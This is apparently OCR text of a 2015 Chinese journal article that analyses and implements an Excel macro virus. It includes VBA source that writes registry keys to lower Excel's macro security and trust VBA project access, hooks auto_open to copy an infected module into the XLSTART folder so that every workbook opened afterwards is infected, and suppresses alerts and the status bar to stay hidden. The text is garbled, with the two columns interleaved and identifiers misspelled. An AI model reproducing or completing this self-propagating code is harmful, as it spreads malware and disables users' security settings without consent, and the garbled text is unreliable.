EXCEL宏病毒的原理分析与实现.pdf

刘络
EXCEL宏病毒的原理分析与实现
毕超群
(延边州机构编制委员会办公室信息中心吉林133000)
【摘要】计算机中宏又称为宏命令,即通过特殊的控制语,将一系列动作简便化。Excl宏病毒是一种寄存在 Excel
文档或模板的宏中的计算机病毒,利用 Excel宏命令编程语言,把特定的宏命令代码附加到指定的文件上,通过文件的打开
或关闭来获取控制权,实现宏命令在不同文件之间的共享和传递,从而在未经使用者许可的情况下获取某种控制权,达到传
染的目的,本文重点分析了 Excel宏病毒的运行原理并加以实现。
【关键词】 EXCEL宏病毒; visual basic;模板
中图分类号:TP393
文献标识码:A
文章编号:1009-6833(2015)02-106-02
0引言
Call Wreg (RK3, Kvaluel, "REG DEXCEL")
宏病毒是一种寄存在文档或模板的宏中的计算机病毒。
Call Wreg(RK4, Kvaluc2, "REG_DEXCEL
旦打开这样的文档,其中的宏就会被执行,于是宏病毒就会被
End Function
激活,转移到计算机上,并驻留在模板上。从此以后,所有自
子函数:实现注册表的写入功能。
动保存的文档都会“感染”上这种宏病毒,而且如果其他用户打
Sub Wreg(strkey As String, Value As Variant, Valuet
开了感染病毒的文档,宏病毒又会转移到他的计算机上。
As String
1 Excel宏病毒的原理
Dim owshell
Set owshell=Createobject ("Wscript. Shell")
创病毒模板K4.xI
If Valuet ype=""Then
owshell Reg Write strkcy, Value
Else
动病毒模板
感染其他
o Wshell. Regwrite strkey, Value, Valuetype
End If
Set owshell =Nothing
End Sub
当运行带有宏病毒的 Excel文件时候,宏病毒通过修改注
2文档控制权的获取
册表,降低 Excel的宏安全级别,使敏感代码获得运行权利。
用户在使用 EXCEL执行打开、保存、打印和关闭文档的
宏病毒被激活后会复制一个副本k4.xls到 Excel I的启动目录里:
时,Excl会指定调用标准的宏。 Excel宏病毒如果隐含在这些
正常操作中,会获得文档的控制权。
C
Documents and Settings\Administrator Application
Data\\EXCELLXLSTART保证个新建和打开的 Excel文件
宏病毒常用的宏有: Autoopen、 Autoclose、 Filesave、
都会自动附加一个k4带毒模块。
Fileprint等等。病毒代码通常隐藏在标准宏中,完成文档控制
2Exce宏病毒的设计实现
权的获取。代码如下:
2.1降低宏安全级别
Private Sub auto open
Microsoft office默认的宏安全级别为高,即只允许运行可
Application Display Alerts=False
靠来源的签署的宏。所以宏病毒想要运行,需要降低安全级别。
If This Workbook. Path Application Startuppath Then
可以通过以下代码实现
Application. Screcnupdating =False
修改注册表,降低 Excel I的宏安全级别,让Exce』接受所
此处,复制带毒宏代码
有VB项目的运行。
Call copytoworkbook
Function Opendoor ()
如果当前文件己经感染,则保存。
Dim Fso, RKI As String, RK2 As String, RK3 As String
If Sheets (1 ). Name >Macrol Then Movemacro4
This Workbook
RK4 As String
Dim Kvalue l As Variant, Kvalue2 As Variant
This Workbook. Save
Dim VS As String
Application. Screenupdating= True
End If
On Error Resume Next
End Sub
VS=Application Version
Set Fso=Createobject ( "SCRIPTING FILESYSTEMOBJECT
2.3病毒的自我隐藏
RK="KEY CURRENT USER\Software Microsoft\
Excel宏病毒在运行时,需要隐藏,避免被发现。通常代码
&VS&"Excell Security \Access VBOM
为:
On Error Resume Next“如果发生错淏,继续执行下面
RK2
HKEY CURRENT USER\Software Microsoftoffice\&VS
语句。
"Excel Security Level
Application, Displaystatus Bar= False“不显示状态栏,避免
RK3="HKEY LOCAL MACHINE Softwarc Microsoft Off
显示宏运行是的状态。
ce&VS&"Excel\Access VBOM
Options. Savenormalprompt= Falsc'如果公共模板被修
RK4="HKEY LOCAL MACHINE Software Microsoft\ Offi
改,不给用户提示窗口而直接保存
ce"& VS &"Excel\Securitylevel
2.4传播与感染
Kvaluel =1
在 Excel的启动目录里保存带毒模块文件k4.xls,导致所有
Kvalue2=1
打开的xls文件都自动附加上这个带毒模块
Call Wreg(RK1, Kvaluel, "REG DEXCEL'
代码实现如下
Call Wreg (RK2, Kvalue2, REG DEXCEL
Function Microsofthobby (
Dim myfile0 As String
106阿络?技亢与用20152
万方数据